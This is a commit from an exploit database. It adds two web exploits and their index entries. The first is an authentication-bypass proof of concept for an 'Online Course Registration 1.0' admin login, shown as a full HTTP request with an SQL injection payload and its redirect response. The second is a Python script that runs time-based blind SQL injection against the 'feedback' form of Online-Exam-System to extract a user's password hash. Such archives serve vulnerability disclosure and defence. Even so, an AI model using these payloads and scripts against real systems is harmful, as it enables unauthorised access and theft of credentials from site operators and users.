DB: 2020-06-06

2 changes to exploits/shellcodes

Online Course Registration 1.0 - Authentication Bypass
Online-Exam-System 2015 - 'feedback' SQL Injection
This commit is contained in:
Offensive Security 2020-06-06 05:01:55 +00:00
parent 533f33f3f4
commit d0531a5e12
3 changed files with 76 additions and 0 deletions

View file

@ -0,0 +1,40 @@
# Exploit Title: Online Course Registration 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-06-05
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : admin/index.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/Online%20Course%20Registration/admin/index.php
POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Referer: http://localhost/Online%20Course%20Registration/admin/index.php
Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
HTTP/1.1 302 Found
Date: Thu, 04 Jun 2020 20:04:27 GMT
Server: Apache/2.4.39 (Win64) PHP/7.3.5
X-Powered-By: PHP/7.3.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: http://localhost/Online Course Registration/admin/change-password.php

34
exploits/php/webapps/48560.py Executable file
View file

@ -0,0 +1,34 @@
# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://github.com/sunnygkp10/
# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
# Affected Version: 2015
# Tested on: Ubuntu
# CVE : N/A
import requests, string, time
from sys import stdout
URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n")
payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^"
payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -"
so_far = hash = ""
while True:
for i in string.digits + string.ascii_lowercase:
so_far = hash + i
payload_to_send = payload + str(so_far) + payload2
data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send}
start = time.time()
r = requests.post(URL + "feed.php", data = data)
request_time = time.time() - start
if request_time > 5:
hash += i
stdout.write(i)
stdout.flush()
break
if len(hash) > 31:
stdout.write("\n")
print "Hash found: " + hash
break

View file

@ -42785,3 +42785,5 @@ id,file,description,date,author,type,platform,port
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php,
48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,

Can't render this file because it is too large.